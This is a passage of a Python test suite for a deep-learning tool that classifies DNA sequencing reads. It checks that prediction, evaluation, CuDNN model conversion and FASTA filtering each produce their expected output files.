print("TEST: Predicting (rapid)...")
paprconfig = self.bloader.get_rapid_training_config()
runname = paprconfig.runname
model = self.bloader.load_rapid_model(log_path="deepac-tests", tpu_resolver=self.tpu_resolver)
compare_rc(model, os.path.join("deepac-tests", "sample_val_data.npy"),
os.path.join("deepac-tests", "{}-logs".format(runname), "val-pred-rapid.npy"))
assert (os.path.isfile(os.path.join("deepac-tests", "{}-logs".format(runname),
"val-pred-rapid.npy"))), "Prediction failed."
print("TEST: Predicting (sensitive)...")
paprconfig = self.bloader.get_sensitive_training_config()
runname = paprconfig.runname
model = self.bloader.load_sensitive_model(log_path="deepac-tests", tpu_resolver=self.tpu_resolver)
compare_rc(model, os.path.join("deepac-tests", "sample_val_data.npy"),
os.path.join("deepac-tests", "{}-logs".format(runname), "val-pred-sensitive.npy"))
assert (os.path.isfile(os.path.join("deepac-tests", "{}-logs".format(runname),
"val-pred-sensitive.npy"))), "Prediction failed."
def test_eval(self):
"""Test evaluating."""
config = configparser.ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), "tests", "configs", "eval-test.ini"))
evaluate_reads(config)
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-metrics.csv"))), "Evaluation failed."
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test_2_sample_val_auc.png"))), "Evaluation failed."
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test_2_sample_val_aupr.png"))), "Evaluation failed."
config = configparser.ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), "tests", "configs", "eval_ens-test.ini"))
evaluate_ensemble(config)
assert (os.path.isfile(os.path.join("deepac-tests",
"ens01-metrics.csv"))), "Evaluation failed."
assert (os.path.isfile(os.path.join("deepac-tests",
"ens01_sample_val_auc.png"))), "Evaluation failed."
assert (os.path.isfile(os.path.join("deepac-tests",
"ens01_sample_val_aupr.png"))), "Evaluation failed."
def test_convert(self):
"""Test converting."""
config = configparser.ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), "tests", "configs", self.test_config))
config['Devices']['DistStrategy'] = "OneDeviceStrategy"
config['Devices']['Device_build'] = "CPU:0"
convert_cudnn(config, os.path.join("deepac-tests", "deepac-test-logs", "deepac-test-e002.h5"), False)
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e002_converted.h5"))), "Conversion failed."
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e002_weights.h5"))), "Conversion failed."
config['Architecture']['MC_Dropout'] = 'True'
convert_cudnn(config, os.path.join("deepac-tests", "deepac-test-logs", "deepac-test-e002_converted.h5"), False)
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e002_converted_converted.h5"))), "Conversion failed."
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e002_converted_weights.h5"))), "Conversion failed."
def test_filter(self):
"""Test filtering."""
model = tf.keras.models.load_model(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e002_converted_converted.h5"))
predict_fasta(model, os.path.join("deepac-tests", "sample-test.fasta"),
os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e002-predictions-sample_test.npy"),
replicates=5)
filter_fasta(os.path.join("deepac-tests", "sample-test.fasta"),
os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e002-predictions-sample_test.npy"),
os.path.join("deepac-tests", "sample-test-filtered-pos.fasta"),
print_potentials=True,
output_neg=os.path.join("deepac-tests", "sample-test-filtered-neg.fasta"),
confidence_thresh=0.65,
output_undef=os.path.join("deepac-tests", "sample-test-filtered-undef.fasta"),
pred_uncertainty=os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e002-predictions-sample_test-std.npy"))
assert (os.path.isfile(os.path.join("deepac-tests", "sample-test-filtered-pos.fasta"))), "Filtering failed."
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.